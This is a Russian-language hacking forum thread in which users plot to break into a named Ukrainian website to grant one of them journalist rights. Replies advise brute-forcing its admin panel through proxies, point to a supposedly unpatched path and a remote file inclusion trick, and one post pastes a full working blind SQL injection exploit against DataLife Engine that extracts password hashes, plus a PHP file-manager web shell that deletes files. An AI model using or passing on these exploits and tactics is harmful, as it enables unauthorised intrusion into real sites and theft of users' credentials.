Кто сможет взломать сайт http://alive.org.ua/
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 11:17:33.286666
|
|
|
xsd55
Сообщений: 10
Оценки: 0
Присоединился: 2010-07-06 16:33:32.003333
|
Кто сможет взломать сайт http://alive.org.ua/ , сайт средне посещаемый но там дырка хоть как должна быть, кто сможеть взломать сайт пожалувства зделайте пользователя xsd55 журналистом
|
|
|
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 11:31:44.426666
|
|
|
RE:Priest
Сообщений: 132
Оценки: 0
Присоединился: 2010-07-01 21:45:21.116666
|
Сайт работает на движке DLE (Datalife Engine), вот ссылка на первый, попавшийся мне эксплоит: http://www.xakep.ru/post/32363/exploit.txt Уверен, что эта дырка уже прикрыта, но пусть будет тебе, как напутствие. Ищи в инете - эксплоиты должны быть. Пробуй брутить админку, но обязательно через прокси-серверы, т.к. там стоит ограничение на кол-во неправильных комбинаций логин/пароль. 3 раза, если не ошибаюсь, затем выскакивает сообщение "Hacking Attempt!" и твой IP временно не допускается. Вот адрес самой админки сайта: http://alive.org.ua/admin.php
|
|
|
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 11:45:04.170000
|
|
|
xsd55
Сообщений: 10
Оценки: 0
Присоединился: 2010-07-06 16:33:32.003333
|
а где можно скачать рабочий брут ссылку в студию, а с ip не проблема просто куки стирать и можно дальше
|
|
|
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 11:47:34.626666
|
|
|
RE:Priest
Сообщений: 132
Оценки: 0
Присоединился: 2010-07-01 21:45:21.116666
|
Про кукисы насмешил. Тебе кто такую чепуху изволил поведать? Куда тебе сайты ломать, если брут в инете найти не можешь?
|
|
|
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 11:52:18.176666
|
|
|
xsd55
Сообщений: 10
Оценки: 0
Присоединился: 2010-07-06 16:33:32.003333
|
сам пробывал если пишет Hacking Attempt! просто стери куки и все, кстати я на этом же сайте и пробывал только пароль журналиста подбирал
|
|
|
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 12:02:57.503333
|
|
|
skteam
Сообщений: 2
Оценки: 0
Присоединился: 2010-07-07 18:24:10.450000
|
вам в раздел работа и услуги
|
|
|
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 13:58:30.960000
|
|
|
Antenwik
Сообщений: 43
Оценки: 0
Присоединился: 2010-06-28 16:26:25.486666
|
ппц. из-за одного журналиста,такую панику поднимать,сайтов полно, так что не теряй время!
|
|
|
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2011-07-13 06:52:36.633333
|
|
|
impulsejkeee
Сообщений: 5
Оценки: 0
Присоединился: 2011-07-13 06:50:43.733333
|
На dle есть баг,его мало закрывают доступ к ФТП,www.Ваш сайт.ru/engine/images/php если будет дыра в сайте,то создай сайт и воспользуйся дуркой http://alive.org.ua/ скрипт в котором дырка/=http:// твой сайт с криптом/
|
|
|
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2011-07-13 06:58:22.796666
|
|
|
impulsejkeee
Сообщений: 5
Оценки: 0
Присоединился: 2011-07-13 06:50:43.733333
|
можно залить на фтп такой скрипт <?php error_reporting (E_ERROR); ini_set("max_execution_time",0); echo ' +========================================+ | RST/GHC Datalife SQL injection exploit | +========================================+ < > Lite Version for DLE <=4.1 < > '; if ($argc < 2 ){ print " Usage: " . $argv[0] . " <host> <user> [table prefix]\n"; print " ex.: " . $argv[0] . " datalife.engine.net admin\n"; credits(); exit; } //DEFINE USER ID $urla = 'http://' . $argv[1] . '/index.php?subaction=userinfo&user=' . $argv[2]; $result = file_get_contents($urla); $str1 = 'user='; #index.php?do=pm&doaction=newpm&user= $position = strpos($result, $str1); if ($position === false){ print "\n\rSorry, no match found for user " . $argv[2]; credits();} $str2 = '">'; $pos = strpos($result, $str2, $position); $pos1 = $position+5; $user_id = intval(substr($result, $pos1, $pos-$pos1)); print "Trying to get hash for password of user ". $argv[2] ." with id=" . $user_id . ":\n"; //SOME defines (aka CONFIG =)) if (empty($argv[3])){ $prefix = 'dle_';} #define prefix of the tables. try to find it yourself =) it is easy =) else {$prefix = $argv[3];} $min = 48; # 0 $max = 122; # z if (check(">$min", 1) == 0 && check("<$max", 1) == 0) {print "\n Site is unvulnerable…"; credits();} for ($sn=1; $sn <= 32; $sn++) { blind($sn, $min, $max); } credits(); // REQUEST function function check($crcheck, $sn) { global $argv, $user_id, $prefix; $host = 'http://' . $argv[1] . '/index.php'; # argv[1] - host $name = $argv[2]; #user name $query = '?subaction=userinfo&user=' . $name .'%2527%20and%20ascii(substring((SELECT%20password%20FROM%20' . $prefix. 'users%20WHERE%20user_id='. $user_id .'),' . $sn . ',1))' .$crcheck . '/*'; # $http = $host . $query; #DEBUG #print $http . "\n"; $result = file_get_contents($http); // checking the answer $string = ': '.$name.'</h2>'; #CORRECT it FOR your version, kids =) #good idea is: 'do=pm&doaction=newpm&user='.$user_id; if (eregi($string, $result)) { return 1; } return 0; } //range function function blind($sn, $fmin, $fmax) { if (($fmax-$fmin)<5) { if (crack($fmin, $fmax, $sn) == 0){print "\n\rEXPLOIT FAILED…"; credits();} return;} $compare = intval($fmin + ($fmax-$fmin)/2); $crcheck = ">". $compare; if ( check($crcheck, $sn) == 1 ) { blind($sn, $compare, $fmax); } else { blind($sn, $fmin, $compare+1); } } //brute function function crack($cmin, $cmax, $sn) { for ($i=$cmin; $i <=$cmax; $i++){ $crcheck = "=$i"; if (check($crcheck, $sn) == 1){print chr($i); return 1;} } return 0; } function credits(){ print "\n\n+========================================+\n\r Credits: 1dt.w0lf & foster \n\r Copyright © RST/GHC"; print "\n\r http://rst.void.ru && http://ghc.ru\n\r+========================================+\n"; exit; } ?> ————————————————- Через этот exploit можно зделать так,создать сайт (только не юкоз) в index.php засунуть exploit (или в другую сираницу).Можно воспользоваться таким скриптом <?php //говорим что это PHP скрипт function cmp( $a, $b ) //обьявляем функции { GLOBAL $sort; //сортируем полученные функции if( $a->inode == $b->inode ) return 0; switch( $sort ) //объявляем , что по каким функциям будет сортироваться { case "size": return ($a->size > $b->size) ? -1 : 1; case "type": return strcmp($a->type, $b->type); case "view": return strcmp($a->view, $b->view); case "atime": return ($a->atime > $b->atime) ? -1 : 1; case "ctime": return ($a->ctime > $b->ctime) ? -1 : 1; case "mtime": return ($a->mtime > $b->mtime) ? -1 : 1; case "group": return strcmp($a->group, $b->group); case "inode": return ($a->inode > $b->inode) ? -1 : 1; case "owner": return strcmp($a->owner, $b->owner); case "perms": return ($a->perms > $b->perms) ? -1 : 1; case "ext": return strcmp($a->ext, $b->ext); case "name": default: return 1; } } function getIcons( $ext ) //объявляем функцию сопоставления иконки с типом файла { switch( $ext ) { case "dir": $file = "dir"; break; case "link": $file = "link"; break; case "zip": case "tgz": case "gz": case "Z": $file = "compressed"; break; case "gif": case "jpg": $file = "image2"; break; case "dvi": $file = "dvi"; break; case "": case "exe": $file = "binary"; break; case "sh": case "php": case "php3": case "sql": case "inc": case "js": $file = "sсriрt"; break; case "txt": $file = "text"; break; case "HТМL": case "sHТМL": case "pHТМL": $file = "world1"; break; default: $file = "generic"; break; } return $IMG="<IMG SRC='icons/".$file.".gif'>"; } class MyFile { //объявляем какие данные будут получены var $name; var $path; var $type; var $ext; var $stype; var $sfile; var $size; var $file; var $atime; var $ctime; var $mtime; var $group; var $inode; var $owner; var $perms; function set( $filename, $path ) { GLOBAL $cd; //объявляем функции перехода по каталогам $this->name = $filename; $this->path = $path; $this->file = $this->path."/".$this->name; $this->type = filetype( $this->file ); $this->size = filesize( $this->file ); $this->atime = fileatime( $this->file ); $this->ctime = filectime( $this->file ); $this->mtime = filemtime( $this->file ); $this->group = filegroup( $this->file ); $this->inode = fileinode( $this->file ); $this->owner = fileowner( $this->file ); $this->perms = fileperms( $this->file ); switch( $this->type ) { case "link": $this->sfile = readlink( $this->file ); $this->stype = filetype( $this->sfile ); $this->ext = "link"; break; case "file": $list = explode( ".", $this->name ); $nb = sizeof( $list ); if( $nb > 0 ) $this->stype = $list[$nb-1]; else $this->stype = "???"; $this->ext = $this->stype; switch( $this->stype ) { case "gif": case "GIF": case "jpg": case "JPG": if( isset( $cd ) ) $pwd = $cd."/"; else $pwd = ""; $this->sfile = "<IMG SRC='".$this->file."'>"; break; default: $this->sfile = $this->stype; break; } break; default: $this->stype = ""; $this->sfile = ""; $this->ext = $this->type; break; } } function formatSize() { return number_format( $this->size, 0, ".", " "); } } function genUrl( $ref, $args, $key = "", $val = "" ) { $valist = ""; reset( $args ); if( $key != "" ) $args[ "$key" ] = $val; if( !is_array( $args ) ) return $ref; while( list( $key, $val ) = each( $args ) ) { if( $val == "" ) continue; if( $valist == "" ) $valist .= "?"; else $valist .= "&"; $valist .= $key."=".$val; } return $ref.$valist; } function updir( $path ) { $last = strrchr( $path, "/" ); $n1 = strlen( $last ); $n2 = strlen( $path ); return substr( $path, 0, $n2-$n1 ); } $ref = "dir.php"; if( isset( $cd ) ) { $path = $cd; //$lcd = "?cd=$cd'"; $args[ "cd" ] = $cd; } else { $path = "."; //$lcd = ""; $args[ "cd" ] = ""; } if( isset( $nb ) ) { for( $i = 0; $i < $nb; $i++ ) { $var = "id_$i"; if( isset( $$var ) ) { $file = $path."/".$$var; if( is_file( $file ) || is_link( $file ) ) { if( unlink( $file ) ) echo "<BR><b>$file</b> успешно удалён\n"; //сообщение об успешном удалении файла else echo "<BR>Не могу удалить выставите права доступа <b>$file</b>\n"; //сообщение о невозможности удалить файл который доступен только для чтения } elseif( is_dir( $file ) ) { if( rmdir( $file ) ) echo "<BR><b>$file</b> успешно удалён\n"; //сообщение об успешном удалении else echo "<BR>файл недоступен для удаления<b>$file</b>\n"; //сообщение о невозможности удалить файл } } } } $step = 100; if( !isset( $sort ) ) $sort = "name"; else $args[ "sort" ] = $sort; if( !isset( $from ) ) $from = 0; else $args[ "from" ] = $from; if( !isset( $to ) ) $to = $from + $step; $d = dir($path); echo "\n"; echo "<br><a href=$ref >Вернуться в начало</a>\n"; //ссылка на возврат в домашнею директорию скрипта $updir = updir($d->path); if( $updir != "." ) echo "<br>Подняться на директорию вверх; <a href=$ref?cd=$updir>$updir</a>\n"; //ссылка на директорию вверх echo "<br>Открыть директорию: <a href=$ref?cd=".$d->path."/..>..</a>\n"; //обновление текущей директории echo "<br>Текущая директория: <b>".$d->path."</b>\n"; //показываем путь до директории и файлов, которые в ней находятся $n = 0; while( $entry=$d->read() ) { $lFiles[ $n ] = new MyFile; $lFiles[ $n ]->set( $entry, $path ); $n++; } $d->close(); //создаём HТМL форму управления функциями echo "<FORM NAME='del' METHOD='post' ACTION='".genUrl( $ref, $args )."'>\n"; echo "<TABLE BORDER=1>\n"; echo "<TR>\n"; echo "<TH>D</TH>\n"; //echo "<TH><a href='".genUrl( $ref, $args, "sort", "type" )."'>Type</a></TH>\n"; echo "<TH><a href='".genUrl( $ref, $args, "sort", "name" )."'>Имя</a></TH>\n"; echo "<TH><a href='".genUrl( $ref, $args, "sort", "size" )."'>Размер</a></TH>\n"; echo "<TH><a href='".genUrl( $ref, $args, "sort", "ext" )."'>Класс</a></TH>\n"; echo "<TH><a href='".genUrl( $ref, $args, "sort", "atime" )."'>В системе</a></TH>\n"; echo "<TH><a href='".genUrl( $ref, $args, "sort", "ctime" )."'>Создан</a></TH>\n"; echo "<TH><a href='".genUrl( $ref, $args, "sort", "mtime" )."'>Изменён</a></TH>\n"; echo "<TH><a href='".genUrl( $ref, $args, "sort", "perms" )."'>Размер</a></TH>\n"; echo "<TH><a href='".genUrl( $ref, $args, "sort", "group" )."'>Группа</a></TH>\n"; echo "<TH><a href='".genUrl( $ref, $args, "sort", "owner" )."'>ow</a></TH>\n"; echo "<TH><a href='".genUrl( $ref, $args, "sort", "inode" )."'>in</a></TH>\n"; echo "<TH>Показ</TH>\n"; echo "</TR>\n"; @usort( $lFiles, cmp ); for( $i = 0; $i < $n; $i++ ) { if( ( $i < $from ) || ( $i >= $to ) ) continue; $k = $i; echo "<TR>\n"; echo "<TD><INPUT TYPE='checkbox' NAME='id_$k' VALUE='". $lFiles[ $k ]->name ."'></TD>\n"; $IMG=getIcons( $lFiles[ $k ]->ext ); $dform = "M j y H:i"; // echo "<TD ALIGN=CENTER >".$lFiles[ $k ]->type."</TD>\n"; echo "<TD>$IMG".$lFiles[ $k ]->name."</TD>\n"; echo "<TD ALIGN=RIGHT >".$lFiles[ $k ]->formatSize()."</TD>\n"; echo "<TD>".$lFiles[ $k ]->ext ."</TD>\n"; echo "<TD>".date( $dform, $lFiles[ $k ]->atime )."</TD>\n"; echo "<TD>".date( $dform, $lFiles[ $k ]->ctime )."</TD>\n"; echo "<TD>".date( $dform, $lFiles[ $k ]->mtime )."</TD>\n"; echo "<TD>".$lFiles[ $k ]->perms."</TD>\n"; echo "<TD>".$lFiles[ $k ]->group."</TD>\n"; echo "<TD>".$lFiles[ $k ]->owner."</TD>\n"; echo "<TD>".$lFiles[ $k ]->inode."</TD>\n"; switch( $lFiles[ $k ]->type ) { case "link": if( $lFiles[ $k ]->stype == "dir" ) { $tcd = $lFiles[ $k ]->path."/".$lFiles[ $k ]->name; echo "<TD><a href='". genUrl( $ref, $args, "cd", $tcd )."'>". $lFiles[ $k ]->sfile."</a></TD>\n"; } else echo "<TD>".$lFiles[ $k ]->sfile."</TD>\n"; break; case "dir": $tcd = $lFiles[ $k ]->path."/".$lFiles[ $k ]->name; echo "<TD><a href='". genUrl( $ref, $args, "cd", $tcd )."'>". $lFiles[ $k ]->name."</a></TD>\n"; break; case "file": echo "<TD>".$lFiles[ $k ]->sfile."</TD>\n"; break; default: echo "<TD>NO</TD>\n"; break; } echo "</TR>\n"; } echo "</TABLE>\n"; $from = $from - $step; if( isset( $cd ) ) { echo "<INPUT TYPE='hidden' NAME='cd' VALUE='$cd'>\n"; } echo "<INPUT TYPE='hidden' NAME='nb' VALUE='$n'>\n"; //echo "<br>from=$from;to=$to;n=$n\n"; echo "<br>\n"; if( $from >= 0 ) { echo "<a href='". genUrl( $ref, $args, "from", $from )."' >Предыдущий</a>/\n"; } if( $to <= $n ) { echo "<a href='". genUrl( $ref, $args, "from", $to )."' >Далее</a> \n"; } echo "<br>\n"; echo "<INPUT TYPE='submit' VALUE='Del'>\n"; echo "</FORM>\n"; ?> //
|
|
|
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2011-07-13 07:09:47.833333
|
|
|
impulsejkeee
Сообщений: 5
Оценки: 0
Присоединился: 2011-07-13 06:50:43.733333
|
quote:
ORIGINAL: RE:Priest Сайт работает на движке DLE (Datalife Engine), вот ссылка на первый, попавшийся мне эксплоит: http://www.xakep.ru/post/32363/exploit.txt Уверен, что эта дырка уже прикрыта, но пусть будет тебе, как напутствие. Ищи в инете - эксплоиты должны быть. Пробуй брутить админку, но обязательно через прокси-серверы, т.к. там стоит ограничение на кол-во неправильных комбинаций логин/пароль. 3 раза, если не ошибаюсь, затем выскакивает сообщение "Hacking Attempt!" и твой IP временно не допускается. Вот адрес самой админки сайта: http://alive.org.ua/admin.php на dle много своих дыр и сама дыра которую не закрыли это http://alive.org.ua/engine/images.php ,если этот работать не будет в коде посмотри путь к шаблону. На сайте надо зарегаться
|
|
|
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2011-07-13 10:50:22.493333
|
|
|
jaconda
Сообщений: 61
Оценки: 0
Присоединился: 2011-05-22 23:50:40.183333
|
А какой язык программирования учат для взлома сайтов ?
|
|
|
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2011-07-13 13:35:02.513333
|
|
|
impulsejkeee
Сообщений: 5
Оценки: 0
Присоединился: 2011-07-13 06:50:43.733333
|
quote:
ORIGINAL: jaconda А какой язык программирования учат для взлома сайтов ? На всех языках программирования.На своем сайте делоаешь страницу,там пишешь вирус,что бы вирус залить на сайт тебе надо сделать так : !DOCTYPE HТМL PUBLIC "-//W3C//DTD XHТМL 1.0 Transitional//EN" "http://www.w3.org/TR/xHТМL1/DTD/xHТМL1-transitional.dtd"> <HТМL xmlns="http://www.w3.org/1999/xHТМL" xml:lang="en" lang="en"> <head> <meta http-equiv="content-type" content="text/HТМL; charset=iso-8859-1" /> <meta name="author" content="" /> <sсriрt type="text/jаvаsсriрt" src="/Путь к вирусы на ява"></scrip <title>Название станицы</title> </head> <bоdу> </bоdу> </HТМL>
|
|
|
|
|